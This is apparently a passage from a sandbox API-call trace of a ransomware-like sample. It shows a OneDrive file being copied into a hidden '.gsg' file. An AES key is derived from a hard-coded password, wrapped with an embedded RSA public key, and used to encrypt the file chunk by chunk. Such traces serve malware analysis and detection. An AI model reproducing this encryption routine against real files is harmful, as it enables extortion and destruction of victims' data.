(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\kk\\filesync.localizedresources.dll.mui")) returned 0x20 [0271.448] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0271.449] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\kk\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0271.450] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\kk\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0271.452] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0271.452] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f283a8) returned 1 [0271.455] CryptCreateHash (in: hProv=0x2f283a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0271.455] lstrlenA (lpString="gRZNKRGLTXaVulDshFSSTuldzMlQm") returned 29 [0271.455] CryptHashData (hHash=0x2fa748, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0271.455] CryptDeriveKey (in: hProv=0x2f283a8, Algid=0x6610, hBaseData=0x2fa748, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fa208) returned 1 [0271.455] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0271.456] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0271.456] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f287e8) returned 1 [0271.456] CryptImportPublicKeyInfo (in: hCryptProv=0x2f287e8, dwCertEncodingType=0x1, pInfo=0x2f31730*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f31760*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f31768*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb048) returned 1 [0271.457] CryptEncrypt (in: hKey=0x2fb048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0271.457] CryptEncrypt (in: hKey=0x2fb048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f28430*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f28430*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0271.457] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f28430*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f28430*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0271.465] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.469] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.469] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.470] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.471] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.471] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.471] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.471] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.471] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.471] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.471] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.471] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.471] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.471] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.471] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.472] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.472] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.472] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.472] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.472] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.472] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.472] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.472] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.472] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.472] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.472] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.472] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.472] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.473] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.473] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.473] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.473] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.473] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.473] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.473] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.473] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.473] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.474] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.474] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.474] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.474] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.474] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.474] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.474] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.474] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.474] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.474] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.474] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.474] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.474] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.475] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.475] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.475] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.475] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.475] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.475] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.475] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.475] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.476] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.476] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.476] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.476] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.476] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.476] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.476] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.476] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.476] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.476] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.476] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.477] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.477] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.477] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.477] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.477] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.477] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.477] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.477] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.477] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.477] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.477] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.477] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.477] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.477] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.477] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 